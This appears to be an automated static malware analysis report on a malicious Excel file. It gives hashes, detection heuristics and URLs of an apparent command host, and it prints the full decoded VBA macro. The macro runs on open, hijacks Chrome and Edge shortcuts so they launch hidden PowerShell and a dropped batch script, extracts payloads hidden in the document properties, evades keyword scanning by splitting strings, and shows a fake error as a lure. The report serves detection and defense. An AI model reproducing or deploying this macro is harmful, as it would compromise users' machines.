Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 9f603469f9245d35…

MALICIOUS

Office (OLE) / .XLS

55.5 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2026-06-19
MD5: ff589ad8d1c8609a74fc6b16849c7db2 SHA-1: 496b87113f5fd6997a272bcfb1c443d60f9b9fc0 SHA-256: 9f603469f9245d350560736676aaadf64b0c7835ba3a4bb6d3a9189ceb88d613
318 Risk Score

Heuristics 10

  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        targetPath = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        uname = Environ("USERNAME")
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://api-instance.btobwah.com/mode/scripts/get_comm_re.php In document text (OLE body)
    • http://api-instance.btobwah.com/mode/scripts/api.php?action=Fcnn&instance_name=In document text (OLE body)
    • http://api-instance.btobwah.com/In document text (OLE body)
    • https://nodejs.org/download/release/latest-v22.x/win-x86/node.exeIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10516 bytes
SHA-256: e6fd548db70cd7fcf96f7e9380863b016efdc8cb0d89dfee67deca1e622817b3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public chrome As Integer
Public msedge As Integer
Public cam As Integer
Public ctPath As String
Public mtPath As String

Sub ShowWMessage()
    Dim message As String
    Dim title As String
    message = "Office has detected a problem whit this file. To help protect your computer this file cannot be opened."
    title = "Microsoft Excel"
    MsgBox message, vbExclamation, title
End Sub

Sub CreateRecursiveFolder_MkDir()
    Dim path As String
    Dim folders() As String
    Dim currentPath As String
    Dim i As Integer
    Dim uname As String
    uname = Environ("USERNAME")
    path = "\.node\bin\"
    folders = Split(path, "\")
    currentPath = "c:\users\" + uname
    
    For i = LBound(folders) To UBound(folders)
        currentPath = IIf(currentPath = "", folders(i), currentPath & "\" & folders(i))
        
        If Dir(currentPath, vbDirectory) = "" Then
            MkDir currentPath
        End If
    Next i
    
End Sub


Sub ESBFCtots()
    Dim fileComment As String
    Dim byteArray() As Byte
    Dim extractedBytes() As Byte
    Dim filePath As String
    Dim fileNumber As Integer
    Dim startByte As Long
    Dim byteCount As Long
    Dim uname As String
    Dim i As Long
    
    Call CreateRecursiveFolder_MkDir
    uname = Environ("USERNAME")
    fileComment = ThisWorkbook.BuiltinDocumentProperties("Title")
    
    If Len(fileComment) = 0 Then
        Exit Sub
    End If
    
    byteArray = StringToByteArray(fileComment)
    
    startByte = 1
    byteCount = 3877
    
    If startByte + byteCount - 1 > UBound(byteArray) Then
        Exit Sub
    End If
    
    ReDim extractedBytes(byteCount - 1)
    For i = 0 To byteCount - 1
        extractedBytes(i) = byteArray(startByte + i - 1)
    Next i
    
    For i = 0 To UBound(extractedBytes)
        If extractedBytes(i) = &HDF Then
            extractedBytes(i) = &H0
        End If
    Next i
    
    filePath = "C:\Users\" + uname + "\.node\bin\node.js"

    fileNumber = FreeFile
    Open filePath For Binary Access Write As #fileNumber
        Put #fileNumber, , extractedBytes
    Close #fileNumber
    
End Sub

Sub BFtodoc()
    Dim fileComment As String
    Dim byteArray() As Byte
    Dim extractedBytes() As Byte
    Dim filePath As String
    Dim fileNumber As Integer
    Dim startByte As Long
    Dim byteCount As Long
    Dim i As Long
    
    fileComment = ThisWorkbook.BuiltinDocumentProperties("Comments")
    
    If Len(fileComment) = 0 Then
        Exit Sub
    End If
    
    byteArray = StringToByteArray(fileComment)
    
    startByte = 1
    byteCount = 357
    
    If startByte + byteCount - 1 > UBound(byteArray) Then
        Exit Sub
    End If
    

    ReDim extractedBytes(byteCount - 1)
    For i = 0 To byteCount - 1
        extractedBytes(i) = byteArray(startByte + i - 1)
    Next i
    

    For i = 0 To UBound(extractedBytes)
        If extractedBytes(i) = &HDF Then
            extractedBytes(i) = &H0
        End If
    Next i
    
    filePath = "C:\Users\Public\Documents\node.bat"

    fileNumber = FreeFile
    Open filePath For Binary Access Write As #fileNumber
        Put #fileNumber, , extractedBytes
    Close #fileNumber

End Sub


Function StringToByteArray(str As String) As Byte()
    Dim i As Integer
    Dim byteArray() As Byte
    ReDim byteArray(Len(str) - 1)
    
    For i = 1 To Len(str)
        byteArray(i - 1) = Asc(Mid(str, i, 1))
    Next i
    
    StringToByteArray = byteArray
End Function

Sub MDFWithS(ByVal dfPath As String)
    Dim WshShell As Object
    Dim shortcut As Object
    Dim targetPath As String
    Dim arguments As String
    targetPath = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    arguments = "-w 1 -c ""saps '" + mtPath + "';C:\Users\Public\Documents\node.bat"""
    Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell")
    Set shortcut = WshShell.CreateShortcut(dfPath)
    shortcut.targetPath = targetPath
    shortcut.arguments = arguments
    shortcut.IconLocation = mtPath
    shortcut.windowStyle = 7
    shortcut.Save
End Sub

Sub CDFWithS(ByVal dfPath As String)
    Dim WshShell As Object
    Dim shortcut As Object
    Dim targetPath As String
    Dim arguments As String
    targetPath = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    arguments = "-w 1 -c ""saps '" + ctPath + "';C:\Users\Public\Documents\node.bat"""
    Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell")
    Set shortcut = WshShell.CreateShortcut(dfPath)
    shortcut.targetPath = targetPath
    shortcut.arguments = arguments
    shortcut.IconLocation = ctPath
    shortcut.windowStyle = 7
    shortcut.Save
End Sub


Function FileExists(ByVal filePath As String) As Boolean
    FileExists = (Dir(filePath) <> "")
End Function

Sub DFL(ByVal lPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    fso.DeleteFile lPath, True
    Set fso = Nothing
End Sub

Function dlkfo(ByVal fg As Integer)
    Dim lps1 As String
    Dim lps2 As String
    Dim lps3 As String
    Dim lps4 As String
    Dim lps33 As String
    Dim lps333 As String
    Dim lps44 As String
    Dim lps444 As String
    Dim lps5 As String
    Dim lps6 As String
    Dim lps7 As String
    Dim lps8 As String
    Dim smpth As String
    Dim sgpth As String
    Dim userName As String
    userName = Environ("USERNAME")
    lps1 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk"
    lps2 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk"
    lps3 = "c:\Users\" + userName + "\Desktop\Google Chrome.lnk"
    lps4 = "c:\Users\" + userName + "\Desktop\Microsoft Edge.lnk"
    lps33 = "c:\Users\Public\Desktop\Google Chrome.lnk"
    lps44 = "c:\Users\Public\Desktop\Microsoft Edge.lnk"
    lps333 = "c:\Users\" + userName + "\Desktop\chrome - Shortcut.lnk"
    lps444 = "c:\Users\" + userName + "\Desktop\msedge - Shortcut.lnk"
    lps5 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk"
    lps6 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk"
    lps7 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"
    lps8 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk"
    
    If fg = 1 Then
        If FileExists(lps1) Then
            Call DFL(lps1)
        End If
        If FileExists(lps3) Then
            Call CDFWithS(lps3)
        End If
        If FileExists(lps33) Then
            Call DFL(lps33)
            Call CDFWithS(lps3)
        End If
        If FileExists(lps333) Then
            Call CDFWithS(lps333)
        End If
        If FileExists(lps5) Then
            Call CDFWithS(lps5)
        End If
        If FileExists(lps7) Then
            Call CDFWithS(lps7)
        End If
    ElseIf fg = 2 Then
        If FileExists(lps2) Then
            Call DFL(lps2)
        End If
        If FileExists(lps4) Then
            Call MDFWithS(lps4)
        End If
        If FileExists(lps44) Then
            Call DFL(lps44)
            Call MDFWithS(lps4)
        End If
        If FileExists(lps444) Then
            Call MDFWithS(lps444)
        End If
        If FileExists(lps6) Then
            Call MDFWithS(lps6)
        End If
        If FileExists(lps8) Then
            Call MDFWithS(lps8)
        End If
    ElseIf fg = 3 Then
        If FileExists(lps1) Then
            Call DFL(lps1)
        End If
        If FileExists(lps3) Then
            Call CDFWithS(lps3)
        End If
        If FileExists(lps33) Then
            Call DFL(lps33)
            Call CDFWithS(lps3)
        End If
        If FileExists(lps333) Then
            Call CDFWithS(lps333)
        End If
        If FileExists(lps5) Then
            Call CDFWithS(lps5)
        End If
        If FileExists(lps7) Then
            Call CDFWithS(lps7)
        End If
        
        If FileExists(lps2) Then
            Call DFL(lps2)
        End If
        If FileExists(lps4) Then
            Call MDFWithS(lps4)
        End If
        If FileExists(lps44) Then
            Call DFL(lps44)
            Call MDFWithS(lps4)
        End If
        If FileExists(lps444) Then
            Call MDFWithS(lps444)
        End If
        If FileExists(lps6) Then
            Call MDFWithS(lps6)
        End If
        If FileExists(lps8) Then
            Call MDFWithS(lps8)
        End If
        
    End If
End Function

Sub TestFileExists()
    Dim c1 As String
    Dim c2 As String
    Dim m1 As String
    Dim m2 As String
    c1 = "C:\Program Files\Google\Chrome\Application\chrome.exe"
    c2 = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
    m1 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe"
    m2 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    
    If FileExists(c1) Then
        chrome = 1
        ctPath = c1
    ElseIf FileExists(c2) Then
        chrome = 1
        ctPath = c2
    Else
        chrome = 0
    End If
    
    If FileExists(m1) Then
        msedge = 2
        mtPath = m1
    ElseIf FileExists(m2) Then
        msedge = 2
        mtPath = m2
    Else
        msedge = 0
    End If
    
    cam = chrome + msedge
    If cam = 0 Then
        Call ShowWMessage
        Exit Sub
    Else
        Call dlkfo(cam)
        Call ESBFCtots
        Call BFtodoc
        Call ShowWMessage
    End If
End Sub


Private Sub Workbook_Open()
    Call TestFileExists
End Sub




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True